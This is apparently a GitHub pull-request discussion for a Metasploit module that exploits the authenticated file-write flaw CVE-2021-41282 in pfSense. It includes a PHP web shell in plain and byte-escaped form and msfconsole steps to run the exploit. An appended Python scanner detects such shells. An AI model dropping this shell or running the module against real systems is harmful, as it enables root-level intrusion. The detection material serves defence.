pfSense Authenticated File Write (CVE-2021-41282) #16245
For anyone making a test VM, pfsense does not always like the default SCSI hard drives. In the past on ESXi, I have needed to specify an IDE interface HDD controller for the boot device.
Meh; I have a target for this. I'll grab it.
```ruby
print_status("Uploading webshell to #{webshell_location}")

# php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
# Escaped form of the shell in the comment above: \xNN byte escapes, '+' for spaces
php_shell = '\\x3c\\x3fphp+if($_GET[\\x22cmd\\x22])+\\x7b+system($_GET[\\x22cmd\\x22])\\x3b+\\x7d+\\x3f\\x3e'
```
We may want to consider something in the future to make this pattern of using a PHP webshell more reusable. Not something we need to handle in this PR but the pattern of dropping a webshell seems to be coming up more often.
Release Notes

This PR adds a module that exploits an authenticated arbitrary file creation vulnerability in the pfSense HTTP interface.
Description

This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an authenticated user if they have the `WebCfg - Diagnostics: Routing tables` privilege. This module uses the vulnerability to create a web shell and execute payloads with `root` privileges.

pfSense's HTTP interface actually allows for arbitrary command execution by the admin user by default (which might be worth its own module), but it also has very granular permissions for other users - down to the specific page. The installation instructions discuss how to create a user that only has access to the routing diagnostics page.

For some reason, there are many of these internet facing (52kish).
The one thing I don't care for about this module is that it deviates from other pfSense modules' `check` implementations. The others extract the version string from the Dashboard view. However, that assumes the user has privileges to see the Dashboard, which isn't a prerequisite to exploit this issue. So I opted to write an exploit `check`, which could leave a file behind on the target 🤷

Two other less useful but worth throwing-out-there observations:

- `modules/exploits/unix`: I thought this belonged in `modules/exploits/freebsd` but I stashed this in `unix` with the others for consistency. 🤷

Verification
```
msfconsole
use exploit/unix/http/pfsense_diag_routes_webshell
set username <name>
set password <password>
set RHOST <ip>
check
set LHOST <ip>
exploit
```
Video || GTFO
https://www.youtube.com/watch?v=cgtxDXJdtPY
PCAP || GTFO
pfsense_diag_reverse.zip
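The module above drops a PHP web shell into the web root, and a reviewer notes that this pattern is becoming common. From the defender's side, the artifact worth looking for is exactly that file. Below is an added example, not code from the pull request or from Metasploit: a small Python scanner that walks a web root and flags PHP files pairing a command-execution primitive with request-controlled input. It also decodes the escaped form the module sends (`\xNN` byte escapes with `+` standing for a space), so the shell is recognised whether it is found encoded or as plain PHP. The web root, sample files and the heuristic itself are constructed for the example; `PAGE_SHELL` is the escaped string from the module, copied for the self-test.

```python
"""Added example, not code from the pull request or from Metasploit: a small
defender-side scanner for PHP web shells of the kind the module above drops.
It also understands the escaped form the module sends ('\\xNN' byte escapes
with '+' standing for a space), so it flags the shell before or after decoding."""
import os
import re
import shutil
import tempfile

# The escaped shell string from the pull request, copied for the self-test below.
PAGE_SHELL = (r"\x3c\x3fphp+if($_GET[\x22cmd\x22])+\x7b+system($_GET[\x22cmd\x22])"
              r"\x3b+\x7d+\x3f\x3e")

# Command-execution primitives and request-controlled inputs; a file using both
# is treated as a web shell candidate (a heuristic, so review hits by hand).
EXEC_FUNCS = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
BYTE_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_escaped(s: str) -> str:
    """Turn the escaped form back into PHP source: \\xNN -> byte, '+' -> space."""
    return BYTE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s).replace("+", " ")


def looks_like_webshell(source: str) -> bool:
    """True when the source, raw or decoded, pairs an exec primitive with request input."""
    for text in (source, decode_escaped(source)):
        if EXEC_FUNCS.search(text) and REQUEST_INPUT.search(text):
            return True
    return False


def scan_webroot(root: str) -> list:
    """Walk a web root and return the PHP files that match the heuristic."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if looks_like_webshell(fh.read()):
                        hits.append(path)
            except OSError:
                continue
    return sorted(hits)


def demo() -> list:
    """Build a constructed web root in a temp dir, scan it, return matching basenames."""
    root = tempfile.mkdtemp(prefix="webroot-")
    try:
        samples = {
            "index.php": '<?php echo htmlspecialchars($_GET["q"] ?? ""); ?>',  # benign page
            "dropped.php": decode_escaped(PAGE_SHELL),                          # shell, plain PHP
            "raw.php": PAGE_SHELL,                                              # shell, still escaped
            "notes.txt": "system($_GET['x'])",                                  # not PHP, skipped
        }
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [os.path.basename(p) for p in scan_webroot(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(decode_escaped(PAGE_SHELL))
    print(demo())
```

Run it as a script to see the decoded shell and the two flagged files; point `scan_webroot` at a real pfSense web root (for example after running the module's `check`, which the author notes may leave a file behind) to confirm what was written. The heuristic is deliberately broad, so treat hits as leads for manual review rather than verdicts.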